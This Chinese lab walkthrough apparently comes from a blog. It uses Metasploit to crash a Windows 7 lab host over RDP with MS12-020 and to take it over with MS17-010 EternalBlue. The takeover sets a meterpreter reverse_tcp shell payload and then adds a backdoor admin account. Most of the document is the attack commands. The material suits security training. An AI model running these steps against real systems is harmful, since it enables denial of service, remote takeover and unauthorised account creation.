MS12-020
首先先进入root用户 su root
msfconsole 从终端进入msf框架
msfconsole
![image-20210429232434694](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010719096-323077406.png)
查找漏洞 search 12_020
search 12_020
![image-20210429232504111](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010718558-648762964.png)
使用该漏洞利用代码
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
![image-20210429233413974](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010718147-1281105957.png)
查看使用方法
show options
![image-20210429233426606](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717810-442691408.png)
查看靶机的ip地址
ipconfig
![image-20210429233806813](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717519-774864518.png)
查看靶机开放端口
netstat -ano
![image-20210429235403692](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010717167-1661590980.png)
开发3389端口
![image-20210429235804953](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716844-1309496832.png)
![image-20210429235947192](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716362-1737856988.png)
![image-20210430000041630](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010716000-698227711.png)
![image-20210430000114648](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010715548-1813523563.png)
![image-20210430000132952](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010715262-2039754615.png)
![image-20210430000142823](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714988-1068321919.png)
![image-20210430000221280](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714733-870204678.png)
![image-20210430001107406](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010714334-1828021266.png)
![image-20210430001142350](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713820-1608790551.png)
![image-20210430001638674](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713424-1560750638.png)
设置参数
set RHOST 192.168.74.134
set RPORT 3389
![image-20210429233952245](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010713097-601215073.png)
查看
show options
![image-20210429234046172](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712784-2082050764.png)
攻击
exploit
或者 run
![image-20210430001750923](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712490-94166863.png)
![image-20210430001944853](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010712133-1213906087.png)
MS17-010
msfconsole 从终端进入msf框架
msfconsole
![image-20210430002110301](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010711772-1538561741.png)
查找MS17-010相关利用代码
search 17_010
![image-20210430002257581](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010711363-355499676.png)
检测内网中存在漏洞的主机系统
use auxiliary/scanner/smb/smb_ms17_010
show options
![image-20210430002355666](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710966-1151140043.png)
![image-20210430002429892](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710617-1528419488.png)
查看445端口是否开放
![image-20210430002956797](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010710260-2019991417.png)
设置参数
set RHOST 192.168.74.134/24
show options
![image-20210430002738779](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709905-547124540.png)
run 出现加号可入侵
run
![image-20210430004134286](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709542-607571691.png)
使用模块进行入侵
search ms17_010
![image-20210430004152722](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010709164-731472706.png)
调用永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
show options
![image-20210430004213005](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010708733-656080131.png)
设置参数
set RHOST 192.168.74.134 set payload windows/x64/meterpreter/reverse_tcp payload set LHOST 192.168.74.134
show options
![image-20210430004230669](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010708270-1319515569.png)
攻击
run
![image-20210430004412043](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010707734-24502025.png)
创建一个ammin用户
net user admin 123456 /add
![image-20210430004437433](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010707068-301001377.png)
到靶机查看
net user
![image-20210430004521099](https://img2020.cnblogs.com/blog/1535189/202104/1535189-20210430010706592-122296550.png)
参考资料
win7旗舰版怎么开启3389端口?
win7怎么打开端口
Metasploit(MSF)快速使用MS12-020、MS17-010(永恒之蓝)漏洞
关于使用msf渗透攻击Win7主机并远程执行命令的复习